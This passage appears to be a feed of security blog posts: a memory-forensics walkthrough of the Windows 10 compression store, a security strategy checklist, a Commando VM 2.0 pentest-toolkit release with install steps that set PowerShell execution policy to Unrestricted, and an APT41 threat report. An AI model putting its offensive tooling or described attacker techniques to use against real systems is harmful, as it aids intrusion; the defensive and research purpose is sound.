Figure 3: PTE of a compressed page in the virtual store an confirmation of virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.

Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note, that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure or nt!SmGlobals needs to be located. This is a straightforward process if symbols are available (see Figure 5).

Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.

Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure) we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index in to the pointer array is the result of dividing the retrieved store index by 32, while the second one is the remainder of the division operation. In our case both indices are 0 and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, will be placed in stores from 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.

Figure 7: Dumping the SMKM_STORE structure

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.

Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete we found that our chunk key is 4b02d. Since it’s a compound value we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, and the offset within the located chunk. The decoding involves four additional SHMP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.

Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.

Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.

Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.


In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1709 x64. The same techniques used here can be applied to Windows 10 1607 and onwards assuming correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.


7 Steps to Building a Cybersecurity Strategy from Scratch

When your organization is young and growing, you may find yourself overwhelmed with a never-ending to-do list.  It can be easy to overlook security when you’re hiring new employees, finding infrastructure, and adopting policies.  Without a proper cybersecurity strategy, however, the business that you’ve put your heart and soul into, or the brilliant idea that you’ve spent years bringing to life, are on the line. Every year, businesses face significant financial, brand, and reputational damage resulting from a data breach, and many small businesses don’t ever recover.

Not only that, but as you grow you may be looking to gain investors or strategic partners.  Many of these firms are not willing to give organizations that don’t take security seriously a chance. A strong security stance can be your differentiator among your customers and within the Venture Capital landscape.

One thing’s for sure: you’ve spent a great deal of time creating a business of your own, so why throw it all away by neglecting your security?  You can begin building your own cybersecurity strategy by following these steps:

1.  Start by identifying your greatest business needs.

This understanding is critical when determining how your vulnerabilities could affect your organization.  Possible business needs could include manufacturing, developing software, or gaining new customers. Make a list of your most important business priorities.

2.  Conduct a third-party security assessment to identify and remediate the greatest vulnerabilities to your business needs.

 The assessment should evaluate your organization’s overall security posture, as well as the security of your partners and contractors.

Once you understand the greatest risks to your business needs, you can prioritize your efforts and budget based on ways to remediate these.

3.  Engage a Network Specialist to set-up a secure network or review your existing network.

A properly designed and configured network can help prevent unwanted users from getting into your environment and is a bare necessity when protecting your sensitive data.

Don’t have a set office space?  If you and your team are working from home or communal office spaces, be sure to never conduct sensitive business on a shared network.

4.  Implement onboarding (and offboarding) policies to combat insider threat, including a third-party vendor risk management assessment.

 Your team is your first line of defense, but as you grow, managing the risk of bringing on more employees can be challenging.  Whether attempting to maliciously steal data or clicking a bad link unknowingly, employees pose great threats to organizations.

As part of your onboarding policy, be sure to conduct thorough background checks and monitor users’ access privileges.  This goes for your employees, as well as any third parties and contractors you bring on.

5.  Implement a security awareness training program and take steps to make security awareness part of your company culture.

Make sure your training program includes topics such as password best practices, phishing identification and secure travel training.  Keep in mind, though, that company-wide security awareness should be more than once-a-year training.  Instead, focus on fostering a culture of cybersecurity awareness.

6.  Set-up multi-factor authentication and anti-phishing measures.

Technology should simplify your security initiatives, not complicate them.  Reduce the number of administrative notifications to only what is necessary and consider improvements that don’t necessarily require memorizing more passwords, such as password managers and multi-factor authentication for access to business-critical data.

7.  Monitor your data and endpoints continuously with a Managed Security Services Provider.

As you grow, so does the amount of endpoints you have to manage and data you have to protect. One of the best ways to truly ensure this data is protected is to have analysts monitoring your data at all hours. A managed security services provider will monitor your data through a 24/7 security operations center, keeping eyes out for any suspicious activity such as: phishing emails, malicious sites, and any unusual network activity.

You’re not done yet: revisit your security strategy as you evolve.  

It’s important to remember that effective cybersecurity strategies vary among organizations. As you grow, you’ll want to consider performing regular penetration testing and implementing an Incident Response Plan.  

And, as your business changes, you must continually reassess your security strategy and threat landscape.

For more information, get the Comprehensive Guide to Building a Cybersecurity Strategy from Scratch.

The post 7 Steps to Building a Cybersecurity Strategy from Scratch appeared first on GRA Quantum.

Commando VM 2.0: Customization, Containers, and Kali, Oh My!

The Complete Mandiant Offensive Virtual Machine (“Commando VM”) swept the penetration testing community by storm when it debuted in early 2019 at Black Hat Asia Arsenal. Our 1.0 release made headway featuring more than 140 tools. Well now we are back again for another spectacular release, this time at Black Hat USA Arsenal 2019! In this 2.0 release we’ve listened to the community and implemented some new must have features: Kali Linux, Docker containers, and package customization.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. We specifically designed Commando VM to be the go-to platform for performing internal penetration tests. The benefits of using Commando VM include native support for Windows and Active Directory, using your VM as a staging area for command and control (C2) frameworks, more easily (and interactively) browsing network shares, and using tools such as PowerView and BloodHound without any worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install software and delivers many tools and utilities to support penetration testing. With over 170 tools and growing, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer.

Recent Updates

Since its initial release at Black Hat Asia Arsenal in March 2019, Commando VM has received three additional updates, including new tools and/or bug fixes. We closed 61 issues on GitHub and added 26 new tools. Version 2.0 brings three major new features, more tools, bug fixes, and much more!

Kali Linux

In 2016 Microsoft released the Windows Subsystem for Linux (WSL). Since then, pentesters have been trying to leverage this capability to squeeze more productivity out of their Window systems. The fewer Virtual Machines you need to run, the better. With WSL you can install Linux distributions from the Windows Store and run common Linux commands in a terminal such as starting up an SSH, MySQL or Apache server, automating mundane tasks with common scripting languages, and utilizing many other Linux applications within the same Windows system.

In January 2018, Offensive Security announced support for Kali Linux in WSL. With our 2.0 release, Commando VM officially supports Kali Linux on WSL. To get the most out of Kali, we've also included VcXsrv, an X Server that allows us to display the entire Linux GUI on the Windows Desktop (Figure 1). Displaying the Linux GUI and passing windows to Windows had been previously documented by Offensive Security and other professionals, and we have combined these to include the GUI as well as shortcuts to take advantage of popular programs such as Terminator (Figure 2) and DirBuster (Figure 3).

Figure 1: Kali XFCE on WSL with VcXsrv

Figure 2: Terminator on Commando VM – Kali WSL with VcXsrv

Figure 3: DirBuster on Commando VM – Kali WSL with VcXsrv


Docker is becoming increasingly popular within the penetration testing community. Multiple blog posts exist detailing interesting functionality using Docker for pentesting. Based on its popularity Docker has been on our roadmap since the 1.0 release in March 2019, and we now support it with our release of Commando VM 2.0. We pull tools such as Amass and SpiderFoot and provide scripts to launch the containers for each tool. Figure 4 shows an example of SpiderFoot running within Docker.

Figure 4: Impacket container running on Docker

For command line docker containers, such as Amass, we created a PowerShell script to automatically run Amass commands through docker. This script is also added to the PATH, so users can call amass from anywhere. This script is shown in Figure 5. We encourage users to come up with their own scripts to do more creative things with Docker.

Figure 5: Amass.ps1 script

This script is also executed when the shortcut is opened.

Figure 6: Amass Docker container executed via PowerShell script


Not everyone needs all of the tools all of the time. Some tools can extend the installation process by hours, take up many gigabytes of hard drive space, or come with unsuitable licenses and user agreements. On the other hand, maybe you would like to install additional reversing tools available within our popular FLARE VM; or you would prefer one of the many alternative text editors or browsers available from the chocolatey community feed. Either way, we would like to provide the option to selectively install only the packages you desire. Through customization you and your organization can also share or distribute the profile to make sure your entire team has the same VM environment. To provide for these scenarios, the last big change for Commando 2.0 is the support for installation customization. We recommend using our default profile, and removing or adding tools to it as you see fit. Please read the following section to see how.

How to Create a Custom Install

Before we start, please note that after customizing your own edition of Commando VM, the cup all command will only upgrade packages pre-installed within your customized distribution. New packages released by our team in the future will not be installed or upgraded automatically with cup all. When needed, these new packages can always be installed manually using the cinst or choco install command, or by adding them to your profile before a new install.

Simple Instructions

  1. Download the zip from into your Downloads folder.
  2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository.
  3. Open an administrative PowerShell window and enable script execution.
    • Set-ExecutionPolicy Unrestricted -f
  4. Change to the unzipped project directory.
    • cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
  5. Execute the install with the -profile_file argument.
    • .\install.ps1 -profile_file .\profile.json

Detailed Instructions

To start customizing your own distribution, you need the following three items* from our public GitHub repository:

  1. Our install.ps1 script
  2. Our sample profile.json
  3. An installation template. We recommend using commandovm.win10.install.fireeye.

*Note: If you download the project ZIP from GitHub it will contain all three items.

The install script will now support an optional -profile_file argument, which specifies a JSON profile. Without the -profile_file argument, running .\install.ps1 will install the default Commando VM distribution. To customize your edition of Commando VM, you need to create a profile in JSON format, and then pass that to the -profile_file argument. Let us explore the sample profile.json profile (Figure 7).

Figure 7: profile.json profile

This JSON profile starts with the env dictionary which specifies many environment variables used by the installer. These environment variables can, and should, be left to their default values. Here is a list of the supported environment variables:

  • VM_COMMON_DIR specifies where the shared libraries should be installed on the VM. After a successful install, you will find a FireEyeVM.Common directory within this location. This contains a PowerShell module that is shared by our packages.
  • TOOL_LIST_DIR and TOOL_LIST_SHORTCUT specify which directory contains the list of all installed packages within the Start Menu and the name of the desktop shortcut, respectively.
  • RAW_TOOLS_DIR environment variable specifies the location where some tools will be installed. Chocolatey defaults to installing tools in %ProgramData%\Chocolatey\lib. This environment variable by default points to %SystemDrive%\Tools, allowing you to more easily access some tools on the command line.
  • And, finally, TEMPLATE_DIR specifies a template package directory relative to where install.ps1 is on disk. We strongly recommend using the commandovm.win10.installer.fireeye package available on our GitHub repository as the template. If your VM is running Windows 7, please switch to the appropriate commandovm.win7.installer.fireeye package. If you are feeling “hacky” and adventurous, feel free to customize the installer further by modifying the chocolateyinstall.ps1 and chocolateyuninstall.ps1 scripts within the tools directory of the template. Note that a proper template will be a folder containing at least 5 things: (1) a properly formatted nuspec file, (2) a “tools” folder that contains (3) a chocolateyinstall.ps1 file, (4) a chocolateyuninstall.ps1 file, and (5) a profile.json file. If you use our template, the only thing you need to change is the packages.json file. The easiest way to do this is just download and extract the commando-vm zip file from GitHub.

With the packages variables set, you can now specify which packages to install on your own distribution. Some packages accept additional installation arguments. You can see an example of this by looking at the openvpn.fireeye entry. For a complete list of packages available from our feed, please see our package list.

Once you finish modifying your profile, you are ready for installation. Run powershell.exe with elevated privileges and execute the following commands to install your own edition of Commando VM, assuming you saved your version of the profile named: myprofile.json (Figure 8).

Figure 8: Example myprofile.json

The myprofile.json file can then be shared and distributed throughout your entire organization to ensure everyone has the same VM environment when installing Commando VM.


Commando VM was originally designed to be the de facto Windows machine for every penetration tester and red teamer. Now, with the addition of Kali Linux support, Docker and installation customization, we hope it will be the one machine for all penetration testers and red teamers. For a complete list of tools, and for the installation script, please see the Commando VM GitHub repository. We look forward to addressing user feedback, adding more tools and features, and creating many more enhancements for this Windows attack platform.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.